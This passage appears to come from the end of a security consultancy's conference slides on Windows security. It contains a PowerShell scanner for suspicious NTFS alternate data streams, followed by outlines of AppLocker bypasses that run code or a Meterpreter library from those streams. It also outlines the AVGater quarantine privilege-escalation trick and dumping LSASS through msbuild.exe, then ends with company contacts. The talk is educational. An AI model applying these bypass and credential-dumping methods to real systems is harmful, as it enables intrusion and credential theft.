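    Get-ChildItem -LiteralPath $Root -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue |
      ForEach-Object {
        $item = $_
        # Every file has the unnamed ':$DATA' stream; anything else is an ADS
        Get-Item -LiteralPath $item.FullName -Stream * -ErrorAction SilentlyContinue |
          Where-Object { $_.Stream -ne ':$DATA' } |
          ForEach-Object {
            $head = Get-Content -LiteralPath $item.FullName -Stream $_.Stream `
                                -Encoding Byte -TotalCount 2 -ErrorAction SilentlyContinue
            $isPE = (@($head).Count -eq 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)
            [pscustomobject]@{
                File        = $item.FullName
                Stream      = $_.Stream
                Bytes       = $_.Length
                LooksLikePE = $isPE
                # Zone.Identifier is the stream Windows writes for internet downloads
                Expected    = ($_.Stream -eq 'Zone.Identifier')
            }
          }
      }
}

Get-SuspiciousStreams | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```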
Bypassing AppLocker
• But you can bypass it …
• Use … as name (or COM1 or append it to C:\)
• Also try to delete the file… ☺
Bypassing AppLocker
• You can also execute applications from ADS:
Bypassing AppLocker
• Or execute libraries…
• We can use it to bypass the AppLocker rule
• DLLs in C:\Windows\* must be executable
• The ADS appears to be in a different folder…
Bypassing AppLocker
• Meterpreter library:
• Start it via Microsoft „control.exe“ (which is whitelisted)
Some more NTFS tricks
• On Windows, non-admin users can't create file links; however, they can create folder links (directory junctions)
• Please note: that's not the same as .lnk files
• Check AVGater: let your AntiVirus detect your file in folder x → it's moved into quarantine. Remove x and create the directory junction x pointing to system32. Click restore in the AntiVirus quarantine → the AntiVirus will copy the file to system32 with its own privileges (SYSTEM privileges) → privilege escalation
• https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
Bypassing AppLocker
• And there are also lots of pre-installed applications which will take your code and run it inside their own process…
• Bypasses Application Whitelisting because the code is executed in the whitelisted application
• Also bypasses reputation based endpoint protection systems
• The current list contains 44 different techniques….
• https://github.com/api0cradle/UltimateAppLockerByPassList
Bypassing AppLocker
• Dropping mimikatz.exe on a victim can trigger all kinds of alerts (AV, IDS, IPS, Endpoint Protection system, …), so let the Microsoft signed msbuild.exe dump the LSASS process for us…
Device Guard
• Microsoft Device Guard
• Similar concept to AppLocker, but based on hardware features and stronger
• Based on the „virtualisation based security“ feature
• Windows 10 Enterprise
• Minimum UEFI version 2.3.1
• x64 architecture
• Also puts PowerShell in Constrained Language mode
• Aim: Run only signed code
Conclusion
• Windows 10 has a pretty good level of security
• Memory corruption exploitation became a lot harder over the last years (at least if all protections are enabled and you don't have script execution)
• Windows security is not as bad as its reputation
• However, there are still many design flaws because of backward compatibility!
WE ARE HIRING
• SEC Consult is hiring!
• Lots of interesting projects in an internationally leading security company
• Experienced team with a passion to hack systems ☺
• Contact: [email protected]
• Just talk to me directly after the talk!
Contact
Germany
SEC Consult Unternehmensberatung Deutschland GmbH
Ullsteinstraße 118 Turm B/8 Stock
12109 Berlin
Tel +49 30 30807283
Email [email protected]
Lithuania
UAB Critical Security, a SEC Consult company
Sauletekio al. 15-311
10224 Vilnius
Tel +370 5 2195535
Email [email protected]
Russia
CJCS Security Monitor
5th Donskoy proyezd, 15, Bldg. 6
119334, Moscow
Tel +7 495 662 1414
Email [email protected]
Singapore
SEC Consult Singapore PTE. LTD
4 Battery Road
#25-01 Bank of China Building
Singapore (049908)
Email [email protected]
Canada
i-SEC Consult Inc.
100 René-Lévesque West, Suite 2500
Montréal (Quebec) H3B 5C9
Email [email protected]
Austria
SEC Consult Unternehmensberatung GmbH
Komarigasse 14/1
2700 Wiener Neustadt
Tel +43 1 890 30 43 0
Email [email protected]
Thailand
SEC Consult (Thailand) Co.,Ltd.
29/1 Piyaplace Langsuan Building 16th Floor, 16B
Soi Langsuan, Ploen Chit Road
Lumpini, Patumwan | Bangkok 10330
Email [email protected]
Switzerland
SEC Consult (Schweiz) AG
Turbinenstrasse 28
8005 Zürich
Tel +41 44 271 777 0 | Fax +43 1 890 30 43 15
Email [email protected]
Austria
SEC Consult Unternehmensberatung GmbH
Mooslackengasse 17
1190 Wien
Tel +43 1 890 30 43 0 | Fax +43 1 890 30 43 15
Email [email protected]
www.sec-consult.com